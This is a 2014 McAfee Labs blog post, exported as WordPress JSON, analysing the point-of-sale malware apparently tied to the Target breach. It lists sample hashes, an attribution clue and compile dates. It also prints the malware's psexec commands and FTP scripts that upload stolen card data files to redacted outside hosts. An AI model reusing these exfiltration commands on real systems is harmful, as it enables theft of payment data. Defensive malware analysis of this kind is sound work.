{"id":32598,"date":"2014-01-16T11:48:45","date_gmt":"2014-01-16T19:48:45","guid":{"rendered":"http:\/\/blogs.mcafee.com\/?p=32598"},"modified":"2025-05-27T20:37:37","modified_gmt":"2025-05-28T03:37:37","slug":"analyzing-the-target-point-of-sale-malware","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/analyzing-the-target-point-of-sale-malware\/","title":{"rendered":"Analyzing the Target Point-of-Sale Malware"},"content":{"rendered":"<p><strong>January 21, 2014: \u00a0<\/strong>As more information comes to light, surrounding these events, we continue to identify and analyze additional components and behaviors. \u00a0 To shed more detailed light on the malware specific to these events, our team in McAfee Labs has released an updated Threat Advisory entitled &#8220;<a title=\"EPOS Data Theft\" href=\"http:\/\/kc.mcafee.com\/corporate\/index?page=content&amp;id=PD24927\" target=\"_blank\" rel=\"noopener noreferrer\">McAfee Labs Threat Advisory: EPOS Data Theft<\/a>&#8220;. \u00a0The report covers specific traits and activity around this family, in addition to some background on &#8220;BlackPOS&#8221;. \u00a0 Updated details around McAfee countermeasures and mitigation are included as well.<\/p>\n<p><a title=\"EPOS Data Theft\" href=\"http:\/\/kc.mcafee.com\/corporate\/index?page=content&amp;id=PD24927\" target=\"_blank\" rel=\"noopener noreferrer\">McAfee Labs Threat Advisory: EPOS Data Theft<\/a><\/p>\n<h2><span style=\"text-decoration: underline;\"><strong>Current AV Detections:<\/strong><\/span><\/h2>\n<ul>\n<li>6597DF782CBD7DC270BB12CDF95D21B4 \u00a0 \u00a0 \u00a0 BackDoor-FBPP<\/li>\n<li>5DBD7BC7A672DA61F6F43AAF6FA3C661 \u00a0 \u00a0 \u00a0 BackDoor-FBPP<\/li>\n<li>BA443C2E10D0278FC30069F61BC56439 \u00a0 \u00a0 \u00a0 BackDoor-FBPP<\/li>\n<li>7F9CDC380EEED16EAAB3E48D59F271AA \u00a0 \u00a0 \u00a0PWS-FBOI<\/li>\n<li>3D5BF67955DC77AF4CA8BF6CB1F96065 \u00a0 \u00a0 \u00a0 \u00a0 PWS-FBOI<\/li>\n<li>BA0F556CE558453AD1526409B5B69EF3 \u00a0 \u00a0 \u00a0 \u00a0 PWS-FBOI<\/li>\n<li>F45F8DF2F476910EE8502851F84D1A6E \u00a0 \u00a0 \u00a0 \u00a0 \u00a0PWS-FBOJ<\/li>\n<li>CE0296E2D77EC3BB112E270FC260F274 \u00a0 \u00a0 \u00a0 \u00a0PWS-FBOJ<\/li>\n<li>4D445B11F9CC3334A4925A7AE5EBB2B7 \u00a0 \u00a0 \u00a0 \u00a0 BackDoor-FBPL<\/li>\n<li>7F1E4548790E7D93611769439A8B39F2 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 BackDoor-FBPL<\/li>\n<li>762DDB31C0A10A54F38C82EFA0D0A014 \u00a0 \u00a0 \u00a0BackDoor-FBPL<\/li>\n<li>C0C9C5E1F5A9C7A3A5043AD9C0AFA5FD \u00a0 \u00a0 \u00a0BackDoor-FBPL<\/li>\n<\/ul>\n<h2><span style=\"text-decoration: underline;\"><strong>Additional Countermeasures<\/strong><\/span><\/h2>\n<ul>\n<li><strong>McAfee Application Control<\/strong> &#8211;\u00a0Run-Time Control locks down systems and provides protection in the form of Execution Control and Memory Protection.<\/li>\n<\/ul>\n<p>Malware of this variety will typically be targeted. \u00a0The adversaries will activly attempt to evade AV detection where possible. \u00a0It is <strong>critical<\/strong> to apply countermeasures outside the typical AV scanning procedures. \u00a0Application Control\/Whitelisting will be extremely successful in blocking\/inhibiting these tools. In addition, network monitoring and controls (real-time monitoring and intelligent analytics of SIEM data) will allow for victims to know exactly what malicious behaviors are occurring in their environment at the time of compromise, and where the artifacts\/indicators are.<\/p>\n<p><strong>January 16, 2014<\/strong>: In the last 24 hours, McAfee Labs has started to piece together more and more detail on the malware that is apparently tied to the campaign against Target. To recap, in November 2013 the retailer was compromised via undisclosed methods. The attackers were able to plant point-of-sale malware and intercept approximately 110,000,000 records worth of payments, transactions, and other personally identifiable data. Working backward, we can start to see evidence of the activity in December (prior to the story&#8217;s breaking) based on underground chatter, VirusTotal submissions, and other open-source intelligence sources.<\/p>\n<p><span style=\"line-height: 1.5em;\">Although there is no official confirmation, we have credible evidence to indicate that the malware used in the Target stores attack is related to existing malware kits sold in underground forums. Related samples to date are somewhat similar in function to (and possibly derived from) known \u201cBlackPOS\u201d samples.<\/span><\/p>\n<h2><b><span style=\"text-decoration: underline;\">Sample Information\/Sources<\/span><\/b><\/h2>\n<ul>\n<li>ce0296e2d77ec3bb112e270fc260f274\u2013ThreatExpert (cache)<\/li>\n<li>F45F8DF2F476910EE8502851F84D1A6E\u2013ThreatExpert (cache)<\/li>\n<li>7f1e4548790e7d93611769439a8b39f2\u2013VirusTotal<\/li>\n<li>4d445b11f9cc3334a4925a7ae5ebb2b7\u2013VirusTotal<\/li>\n<li>762ddb31c0a10a54f38c82efa0d0a014\u2013Virus Total<\/li>\n<li>c0c9c5e1f5a9c7a3a5043ad9c0afa5fd\u2013VirusTotal<\/li>\n<\/ul>\n<p><span style=\"line-height: 1.5em;\">7f1e4548790e7d93611769439a8b39f2 and 4d445b11f9cc3334a4925a7ae5ebb2b7 are uploaders that reveal many useful details about data collection, data transfer, and possibly the actor behind the campaign.<\/span><\/p>\n<h2><b style=\"line-height: 1.5em;\"><span style=\"text-decoration: underline;\">Possible Actor\/Attribution Data<\/span><\/b><\/h2>\n<p>Both uploaders contain the following string (compile path)<\/p>\n<ul>\n<li>z:\\Projects\\<strong>Rescator<\/strong>\\uploader\\Debug\\scheck.pdb<\/li>\n<\/ul>\n<p>Rescator is a known actor in various cybercrime forums.<\/p>\n<h2><b style=\"line-height: 1.5em;\"><span style=\"text-decoration: underline;\">Data Collection and Transfer<\/span><\/b><\/h2>\n<p>Data is collected and transferred to internal shares via the following command syntax:<\/p>\n<ul>\n<li>c:\\windows\\system32\\cmd.exe, c:\\windows\\system32\\cmd.exe \/c psexec \/accepteula \\\\<em>&lt;EPOS_IPaddr&gt; -u &lt;username&gt; -p &lt;password&gt;<\/em> cmd \/c &#8220;taskkill \/im bladelogic.exe \/f&#8221;<\/li>\n<li>c:\\windows\\system32\\cmd.exe, c:\\windows\\system32\\cmd.exe \/c psexec \/accepteula \\\\<em>&lt;EPOS_IPaddr&gt; -u &lt;username&gt; -p &lt;password&gt;<\/em> -d bladelogic<\/li>\n<li>c:\\windows\\system32\\cmd.exe, c:\\windows\\system32\\cmd.exe \/c move \\\\<em>&lt;EPOS_IPaddr&gt;<\/em>\\nt\\twain_32a.dll c:\\program files\\xxxxx\\xxxxx\\temp\\data_2014_1_16_15_30.txt<\/li>\n<li>c:\\windows\\system32\\cmd.exe, c:\\windows\\system32\\cmd.exe \/c ftp -s:c:\\program files\\xxxxx\\xxxxx\\temp\\cmd.txt<\/li>\n<\/ul>\n<p><strong>Note:\u00a0<\/strong>The reference to &#8220;bladelogic&#8221; is a method of obfuscation. \u00a0The malware does not compromise, or integrate with, any BMC products in any way. \u00a0 The executable name &#8220;bladelogic.exe&#8221; does not exist in any piece of legitimate BMC software.<\/p>\n<p>\u201cttcopscli3acs\u201d is reportedly a Windows domain name used within Target stores.<\/p>\n<p><span style=\"line-height: 1.5em;\">7f1e4548790e7d93611769439a8b39f2 and 4d445b11f9cc3334a4925a7ae5ebb2b7 drop the following script upon execution:<\/span><\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br \/>\nopen xxx.xxx.xxx.xx<\/p>\n<p>%name%<\/p>\n<p>%password%<\/p>\n<p>cd public_html<\/p>\n<p>cd cgi-bin<\/p>\n<p>bin<\/p>\n<p>send C:\\Program Files\\xxxxxx \\xxxxxxxx\\Temp\\data_2014_%_%_%%_%%.txt<\/p>\n<p>quit<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/p>\n<p><span style=\"line-height: 1.5em;\">Similar scripts are present in 762ddb31c0a10a54f38c82efa0d0a014 and c0c9c5e1f5a9c7a3a5043ad9c0afa5fd.<\/span><\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br \/>\nopen xx.xxx.xxx.xx<\/p>\n<p>%name%<\/p>\n<p>%password%<\/p>\n<p>cd 001<\/p>\n<p>bin<\/p>\n<p>send C:\\Program Files\\xxxxxx \\xxxxxxxx\\Temp\\data_2014_data_2014_%_%_%%_%%.txt<\/p>\n<p>quit<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br \/>\nopen xx.xx.xxx.xx<\/p>\n<p>%name%<\/p>\n<p>%password%<\/p>\n<p><span style=\"line-height: 1.5em;\">cd etc<\/span><\/p>\n<p>bin<\/p>\n<p>send C:\\Program Files\\xxxxxx \\xxxxxxxx\\Temp\\data_2014_data_2014_%_%_%%_%%.txt<\/p>\n<p>quit<\/p>\n<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<\/p>\n<h2><b><span style=\"text-decoration: underline;\">Compilation Dates<\/span><\/b><\/h2>\n<ul>\n<li>762ddb31c0a10a54f38c82efa0d0a014 &#8211; Sat Nov 30 17:52:00 2013 UTC<\/li>\n<li>4d445b11f9cc3334a4925a7ae5ebb2b7 &#8211; Sat Nov 30 17:21:17 2013 UTC<\/li>\n<li>c0c9c5e1f5a9c7a3a5043ad9c0afa5fd &#8211; Tue Dec\u00a0 3 00:15:01 2013 UTC<\/li>\n<li>7f1e4548790e7d93611769439a8b39f2 &#8211; Sat Nov 30 17:38:23 2013 UTC<\/li>\n<\/ul>\n<p><b><span style=\"text-decoration: underline;\">\u00a0<\/span><\/b><\/p>\n","protected":false},"excerpt":{"rendered":"<p>January 21, 2014: \u00a0As more information comes to light, surrounding these events, we continue to identify and analyze additional components&#8230;<\/p>\n","protected":false},"author":695,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[1411,76,142,180,18],"coauthors":[4136],"class_list":["post-32598","post","type-post","status-publish","format-standard","hentry","category-mcafee-labs","tag-advanced-persistent-threats","tag-cybercrime","tag-tag-identity-theft","tag-malware","tag-network-security"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Analyzing the Target Point-of-Sale Malware | McAfee Blog<\/title>\n<meta name=\"description\" content=\"January 21, 2014: \u00a0As more information comes to light, surrounding these events, we continue to identify and analyze additional components and behaviors.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Analyzing the Target Point-of-Sale Malware | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"January 21, 2014: \u00a0As more information comes to light, surrounding these events, we continue to identify and analyze additional components and behaviors.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/analyzing-the-target-point-of-sale-malware\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2014-01-16T19:48:45+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-05-28T03:37:37+00:00\" \/>\n<meta name=\"author\" content=\"McAfee Labs\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@McAfee_Labs\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"McAfee Labs\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/analyzing-the-target-point-of-sale-malware\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/analyzing-the-target-point-of-sale-malware\/\"},\"author\":{\"name\":\"McAfee Labs\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\"},\"headline\":\"Analyzing the Target Point-of-Sale Malware\",\"datePublished\":\"2014-01-16T19:48:45+00:00\",\"dateModified\":\"2025-05-28T03:37:37+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/analyzing-the-target-point-of-sale-malware\/\"},\"wordCount\":935,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"keywords\":[\"advanced persistent threats\",\"cybercrime\",\"identity theft\",\"malware\",\"network security\"],\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/analyzing-the-target-point-of-sale-malware\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/analyzing-the-target-point-of-sale-malware\/\",\"name\":\"Analyzing the Target Point-of-Sale Malware | McAfee Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"datePublished\":\"2014-01-16T19:48:45+00:00\",\"dateModified\":\"2025-05-28T03:37:37+00:00\",\"description\":\"January 21, 2014: \u00a0As more information comes to light, surrounding these events, we continue to identify and analyze additional components and behaviors.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/analyzing-the-target-point-of-sale-malware\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/analyzing-the-target-point-of-sale-malware\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/analyzing-the-target-point-of-sale-malware\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Analyzing the Target Point-of-Sale Malware\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\",\"name\":\"McAfee Labs\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"caption\":\"McAfee Labs\"},\"description\":\"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.\",\"sameAs\":[\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee_Labs\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Analyzing the Target Point-of-Sale Malware | McAfee Blog","description":"January 21, 2014: \u00a0As more information comes to light, surrounding these events, we continue to identify and analyze additional components and behaviors.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"Analyzing the Target Point-of-Sale Malware | McAfee Blog","og_description":"January 21, 2014: \u00a0As more information comes to light, surrounding these events, we continue to identify and analyze additional components and behaviors.","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/analyzing-the-target-point-of-sale-malware\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_author":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2014-01-16T19:48:45+00:00","article_modified_time":"2025-05-28T03:37:37+00:00","author":"McAfee Labs","twitter_card":"summary_large_image","twitter_creator":"@McAfee_Labs","twitter_site":"@McAfee","twitter_misc":{"Written by":"McAfee Labs","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/analyzing-the-target-point-of-sale-malware\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/analyzing-the-target-point-of-sale-malware\/"},"author":{"name":"McAfee Labs","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad"},"headline":"Analyzing the Target Point-of-Sale Malware","datePublished":"2014-01-16T19:48:45+00:00","dateModified":"2025-05-28T03:37:37+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/analyzing-the-target-point-of-sale-malware\/"},"wordCount":935,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"keywords":["advanced persistent threats","cybercrime","identity theft","malware","network security"],"articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/analyzing-the-target-point-of-sale-malware\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/analyzing-the-target-point-of-sale-malware\/","name":"Analyzing the Target Point-of-Sale Malware | McAfee Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"datePublished":"2014-01-16T19:48:45+00:00","dateModified":"2025-05-28T03:37:37+00:00","description":"January 21, 2014: \u00a0As more information comes to light, surrounding these events, we continue to identify and analyze additional components and behaviors.","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/analyzing-the-target-point-of-sale-malware\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/analyzing-the-target-point-of-sale-malware\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/analyzing-the-target-point-of-sale-malware\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"Analyzing the Target Point-of-Sale Malware"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad","name":"McAfee Labs","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg","caption":"McAfee Labs"},"description":"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. See our blog posts below for more information.","sameAs":["https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee_Labs"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/32598","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/695"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=32598"}],"version-history":[{"count":2,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/32598\/revisions"}],"predecessor-version":[{"id":214512,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/32598\/revisions\/214512"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=32598"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=32598"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=32598"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=32598"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}